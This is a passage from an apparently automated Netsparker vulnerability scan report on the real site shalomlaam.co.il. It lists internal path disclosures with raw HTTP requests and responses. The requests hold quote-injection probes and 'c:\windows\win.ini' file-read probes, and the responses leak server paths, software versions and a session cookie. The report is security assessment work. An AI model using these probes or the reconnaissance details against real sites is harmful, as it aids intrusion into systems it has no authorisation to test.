'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.59. /ask/answer.asp
http://www.shalomlaam.co.il/ask/answer.asp?id=232
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /ask/answer.asp?id=232 HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

. , , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

133 / 146
18.60. /sh/
http://www.shalomlaam.co.il/sh/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /sh/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.61. /reg/Default.asp
http://www.shalomlaam.co.il/reg/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /reg/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/reg/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.62. /pitgam/
http://www.shalomlaam.co.il/pitgam/?nsextt=NSFTW
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /pitgam/?nsextt=NSFTW HTTP/1.1
Referer: http://www.shalomlaam.co.il/pitgam
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
134 / 146
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.63. /alon/list.asp
http://www.shalomlaam.co.il/alon/list.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /alon/list.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.64. /l/agrala_miadim.asp
http://www.shalomlaam.co.il/l/agrala_miadim.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /l/agrala_miadim.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/l/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.65. /gallery/snifim.asp
http://www.shalomlaam.co.il/gallery/snifim.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
135 / 146
Certainty
Request
GET /gallery/snifim.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/gallery/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

,,,,,,,,,'>
<meta name="Description" CONTENT=" ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.66. /bmidrash/list.asp
http://www.shalomlaam.co.il/bmidrash/list.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /bmidrash/list.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/bmidrash/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.67. /alon/Default.asp
http://www.shalomlaam.co.il/alon/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /alon/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/alon/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

136 / 146
18.68. /allvideo/
http://www.shalomlaam.co.il/allvideo/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /allvideo/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.69. /Presentation/
http://www.shalomlaam.co.il/Presentation/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /Presentation/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.70. /bmidrash/answer.asp
http://www.shalomlaam.co.il/bmidrash/answer.asp?id=128
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /bmidrash/answer.asp?id=128 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/bmidrash/answer.asp?id=128&alon=460
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
137 / 146
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.71. /Presentation/Default.asp
http://www.shalomlaam.co.il/Presentation/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /Presentation/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/Presentation/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.72. /video/
http://www.shalomlaam.co.il/video/
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /video/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

,,,'>
<meta name="Description" CONTENT=" , , ">
<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.73. /bmidrash/Default.asp
http://www.shalomlaam.co.il/bmidrash/Default.asp?id=0
Identified Internal Path(s)
/home/1.css
/home/home_page.css
138 / 146
Certainty
Request
GET /bmidrash/Default.asp?id=0 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/bmidrash/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

18.74. /lessons/default.asp
http://www.shalomlaam.co.il/lessons/default.asp
Identified Internal Path(s)
/home/1.css
/home/home_page.css
Certainty
Request
GET /lessons/default.asp HTTP/1.1
Referer: http://www.shalomlaam.co.il/lessons/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

'. . ' ' : , ">


<base href="http://www.shalomlaam.co.il/" />
<link href="/home/1.css" rel="stylesheet" type="text/css" />
<link href="/home/home_page.css" rel="stylesheet" type="text/css" />
<script src="/js/func_site.js" type="text/javascript"></script>
<script src="/js/AC_RunActiveContent.js" type="text/javascript"></script>
<!--<script src="/Sc

139 / 146
15 TOTAL
INFORMATION
19. [Possible] Internal Path Leakage (Windows)
Netsparker identified an internal path in the document.
{PRODUCT} identified a possible Internal Path Disclosure (Windows) in the document.
Impact
There is no direct impact, however this information can help an attacker identify other vulnerabilities or help during the exploitation of other identified
vulnerabilities.
Remedy
Ensure this is not a false positive. Due to the nature of the issue, {PRODUCT} could not confirm that this file path was actually the real file path of the target
web server.
Error messages should be disabled.
Remove this kind of sensitive data from the output.
External References
OWASP - Full Path Disclosure
Classification
PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
19.1. /ask/Default.asp
http://www.shalomlaam.co.il/ask/Default.asp?id=0&CatID=%27
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ASK\../pagetop.asp
Certainty
Request
GET /ask/Default.asp?id=0&CatID=%27 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/ask/?CatID=0&page=2
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 13:56:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 345
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<title> - </title>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ASK\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.2. /tags/tags.asp
http://www.shalomlaam.co.il/tags/tags.asp?CatID=%2527&page=2&l=3
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\TAGS\../pagetop.asp
Certainty
Request
GET /tags/tags.asp?CatID=%2527&page=2&l=3 HTTP/1.1
Referer: http://www.shalomlaam.co.il/tags/tags.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
140 / 146
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:28:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 308
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\TAGS\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.3. /vod/vod.asp
http://www.shalomlaam.co.il/vod/vod.asp?id=c%3a%5cwindows%5cwin.ini
Identified Internal Path(s)
c:\windows\win.ini_fix.mp4
Certainty
Request
GET /vod/vod.asp?id=c%3a%5cwindows%5cwin.ini HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

';
}
</script>
<tr><td align="center">
<video width="594" height="350" controls>
<!--<source src="http://80.179.48.178/shiloftp/nekoda/video/slaam/c:\windows\win.ini_fix.mp4" type="video/mp4">-->
<source src="http://lavishilo.org/temp/54.mp4" type="video/mp4">
Your browser does not support the video tag.
</video>
</td></tr><tr>
<Td dir="rtl" valign=

19.4. /pitgam/
http://www.shalomlaam.co.il/pitgam/?CatID=%2527
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp
Certainty
Request
GET /pitgam/?CatID=%2527 HTTP/1.1
Referer: http://www.shalomlaam.co.il/pitgam/?nsextt=NSFTW
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:35:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 310
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
141 / 146
19.5. /ask/
http://www.shalomlaam.co.il/ask/?CatID=%2527&page=2
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ASK\../pagetop.asp
Certainty
Request
GET /ask/?CatID=%2527&page=2 HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 345
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<title> - </title>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ASK\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.6. /alon/list.asp
http://www.shalomlaam.co.il/alon/list.asp?id=0&CatID=%27
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp
Certainty
Request
GET /alon/list.asp?id=0&CatID=%27 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/alon/list.asp?CatID=460
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 13:57:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 308
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'CatID'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\ALON\../pagetop.asp</font><font face="Arial" size=2>, line 43</font>
19.7. /gallery/
http://www.shalomlaam.co.il/gallery/?page=%2527
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp
Certainty
142 / 146
Request
GET /gallery/?page=%2527 HTTP/1.1
Referer: http://www.shalomlaam.co.il/gallery/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Date: Tue, 20 May 2014 14:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 310
Content-Type: text/html
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'Cint'</font><p><font
face="Arial" size=2>D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\GALLERY\../pagetop.asp</font><font face="Arial" size=2>, line 86</font>
19.8. /gallery/branches.asp
http://www.shalomlaam.co.il/gallery/branches.asp?id=c%3a%5cwindows%5cwin.ini
Identified Internal Path(s)
c:\windows\win.ini&quot
Certainty
Request
GET /gallery/branches.asp?id=c%3a%5cwindows%5cwin.ini HTTP/1.1
Referer: http://www.shalomlaam.co.il/Branches/snif.asp?id=28
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

" align="center"><tr>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: '[string:
&quot;c:\windows\win.ini&quot;]'</font><p><font face="Arial" size=2>/gallery/branches.asp</font><font face="Arial" size=2>, line 90</font>
19.9. /pitgam/Default.asp
http://www.shalomlaam.co.il/pitgam/Default.asp?id=0&CatID=%27
Identified Internal Path(s)
D:\WEB\SHILOFTP\SHALOMLAAM.CO.IL\PITGAM\../pagetop.asp
Certainty
Request
GET /pitgam/Default.asp?id=0&CatID=%27 HTTP/1.1
Referer: http://www.shalomlaam.co.il/site/pitgam/?CatID=459
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
